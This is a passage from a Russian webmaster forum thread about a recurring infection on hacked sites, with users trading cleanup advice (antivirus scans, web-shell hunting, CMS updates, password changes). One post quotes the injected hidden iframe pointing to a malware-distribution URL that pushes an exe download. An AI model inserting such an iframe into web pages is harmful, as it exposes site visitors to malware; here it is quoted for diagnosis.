Постоянный вирус на сайте

123
MN
На сайте с 11.01.2012
Offline
50
#11

похожая история

лезет ифрейм ...

<iframe src="http://newtraff.ru/go.php?sid=3" width="0" height="0" frameborder="0"></iframe>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

При заходе на сайт выходит сразу окошко с предложением скачать 500 килобайтный ехе шник ))

причем уже прописался в самой верхней строке. Менял пассы на фтп, движок DLE нуленный ... качал если помнится у мид тима (есть еще один длешник нуленный 8.5 который пашет стабильно, думал его же нул скачаю и все норм будет), грешу на шел в темплейте. Как его пропалить ума не приложу. Сайты с он лайн проверкой на вири пишут что все в шоколаде.

Да кстати, хост халявный от РСЯ ... ну кто в директе учавсвтвует могут переносить сайты на их хост, думал потестю ка ... не думаю что в хосте дело.

http://fzs-roskazna.ru/ (http://fzs-roskazna.ru/) - Формирование запроса ЭЦП
ШO
На сайте с 27.12.2005
Offline
375
#12

Выкачать все содержимое публичной папки и проверить каспером, если шелл не найдется, то нужно исакать дыры, через которые ломают, или менять хостинг.

MN
На сайте с 11.01.2012
Offline
50
#13

посмотрел логи на хосте, шла ссылка на юзера, в различных вариантах ... но в бд юзера не было, в бд вообще только 1 юзер - я. Да и пас от админки был очень простой и логин дефаултный ... короче сменил admin.php (переименовал), поставил пасс по сложнее - пока полет нормальный.

[Удален]
#14

Тоже сталкивался с подобной проблемой. Решение такой нашел:

- http://joomlaforum.ru/index.php?topic=198048.0

- заменил само ядро joomla!

- удалил всё старое и ненужное (неактивные темки, плагины)

- заменил пасс от админки и ФТП, приэтом не сохранял их и баузере🙅

minor
На сайте с 04.10.2010
Offline
70
#15

К выше сказанному, проверить все папки и их права, поставить систему мониторинга изменения файлов сайта.

PHP experience 2 year, comprehend seo
[Удален]
#16

И перепроверить все комменты

TBAG
На сайте с 28.05.2012
Offline
78
#17
Трудолюбивый:
Обратитесь на античате,вероятнее всего у вас шелл.
Даже если найдете, на вашей CMS есть уязвимость, смена паролей на фтп не поможет.

Уязвимости можно закрыть модулем защиты или обновлением до более свежей версии Joomla. Как правило, в ситуации ТС желательно выгрузить сайт и просканировать антивирусом т.к. онлайн-антивирусы часто пропускают вирусы! Еще советую почитать про удаление вирусов с сайта и проверить доктор вебом.

http://presite.ru/ (http://presite.ru/) - SMM (http://presite.ru/karta-sayta-1.html) только самые качественные материалы (http://www.presite.ru/#top) по раскрутке сайтов и их оптимизации в поисковых системах (http://presite.ru/index.php?option=com_xmap&sitemap=1&view=xml).
CrePashOk
На сайте с 12.10.2011
Offline
21
#18

Джумла сама по себе уязвимая система в плане защиты, ведь вся проблема в том, что многие люди ставят модуля и компоненты с левых сайтов, где вполне возможно ждут свой выход вирусня. Ну и конечно обновления

Полный спектр услуг по WordPress (http://www.wpteam.net). icq: 55559939, skype: crepashok, portfolio: wpteam (http://www.wpteam.net/portfolio)
TBAG
На сайте с 28.05.2012
Offline
78
#19
CrePashOk:
Джумла сама по себе уязвимая система в плане защиты, ведь вся проблема в том, что многие люди ставят модуля и компоненты с левых сайтов, где вполне возможно ждут свой выход вирусня. Ну и конечно обновления

Да, с этим я согласен. Хотя при желании можно закрыть дыры по максимуму.

K5
На сайте с 21.07.2010
Offline
209
#20

как определи что вирус на сайте (может вирусная реклама висит)???

чужие файлы/папки появляются???

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий